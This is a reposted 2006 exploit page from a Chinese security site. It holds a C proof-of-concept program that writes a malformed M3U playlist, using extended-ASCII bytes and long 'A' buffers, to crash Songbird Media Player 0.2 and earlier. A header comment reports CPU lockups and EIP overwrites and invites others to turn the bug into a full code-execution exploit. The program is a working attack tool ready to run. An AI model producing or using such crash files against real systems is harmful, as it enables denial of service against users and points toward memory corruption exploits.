首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Songbird Media Player <= 0.2 Format String Denial of Service PoC
来源:GLinares.code@gmail.com 作者:Greg 发布时间:2006-11-29  

/*
========================================================================
0-day Songbird Media Player <= 0.2 Format String Denial Of Service PoC
========================================================================
Songbird Media Player and lower experiance a format string conversion error
when attempting to parse out malformed M3U Playlist files in which extended
ascii exists in any field.

The problem seems to originate in the unicode coverter which kicks into
effect when extended ascii is present in a M3U file. It can even cause
a huge spike in CPU Resources, a few times mine flatlined at 99% after exploit
and required a system reboot.

I don't have the time to try to turn this into an exploit, but i've seen
it overwrite EIP with some values - the string is getting converted to unicode
prior to the error. And sometimes EIP gets randomly overwritten with values,
and sometimes the application just crashes.

For me using this exploit EIP gets overwritten with 0x35382534 = "58%4"
sometimes its 0x3f3f3f3f and sometimes its 0xfffffff3.

I noticed removing a file extension from the exploit causes EIP to get
overwriten
more frequently.

Im sure someone will turn this into an exploit, just credit me with my name and
email address in the exploit, I'll be more than happy.


Happy Hunting and Happy Holidays to everyone

<insert super awesome leet ascii art here>

November 2006 - Month Of Greg's Media Player Exploits :)
(i'll probably continue it into December)

Discovered and Reported By: Greg Linares GLinares.code@gmail.com
Reported Exploit Date: 11/28/2006

*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[])
{

FILE *Exploit;
char buffer[512];

int x;

printf("\n======================================================================\n");
printf("0-day Songbird Media Player <= 0.2 Format String Denial Of Service PoC \n");
printf("Crashes Songbird Player sometimes consumes 99%% CPU and needs reboot \n");
printf("Discovered and Coded By: Greg Linares <GLinares.code[at]gmail[dot]com>\n");
printf("Usage: %s <output M3U file>\n", argv[0]);
printf("====================================================================\n\n\n");


if (argc < 2) {
printf("Invalid Number Of Arguments\n");
return 1;
}


Exploit = fopen(argv[1],"w");
if ( !Exploit )
{
printf("\nCouldn't Open File!");
return 1;
}

memset(buffer, 0, 512);

for (x=0;x<512;x++) {
strcat(buffer, "A");
}


/* I havent played around with much extended ascii but i do know \xb5 - \xbf work */

/* Vulgar Fractions Scare Me Too */

fputs("#EXTM3U\r\n#EXTINF:0,0_day_Songbird_Format_String_PoC_by_Greg_Linares\xbc", Exploit);
fputs(buffer, Exploit);
fputs(buffer, Exploit);
fputs("\r\nC:\\", Exploit);
fputs(buffer, Exploit);
/*
This works as well here but sometimes EIP doesnt get overwritten and the application just crashes.

fputs(".mp3\r\n", Exploit);
fputs("C:\\RANDOMFILENAMEHERE\xbc\xbx\xbc\xbc", Exploit);
fputs(buffer, Exploit);
fputs(".mp3\r\n", Exploit);
*/


printf("Exploit Succeeded...\n Output File: %s\n\n", argv[1]);


printf("Questions, Comments, Feedback --> Greg Linares (GLinares.code[at]gmail[dot]com)\n");

fclose(Exploit);
return 0;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Quintessential Player <= 4.
·Kubix <= 0.7 Multiple Remot
·Discuz! 4.x SQL Injection / Ad
·3ctftpsvc Buffer Overflow (Lon
·Evince Document Viewer (Docume
·AT-TFTP Buffer Overflow (Long
·PHP <= 4.4.4/5.1.6 htmlenti
·Exploits 3CTftpSvc Server 2.0.
·ProFTPD 1.3.0 (sreplace) Remot
·3Com TFTP Service <= 2.0.1
·AT-TFTP <= 1.9 (Long Filena
·Acer LunchApp.APlunch (ActiveX
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved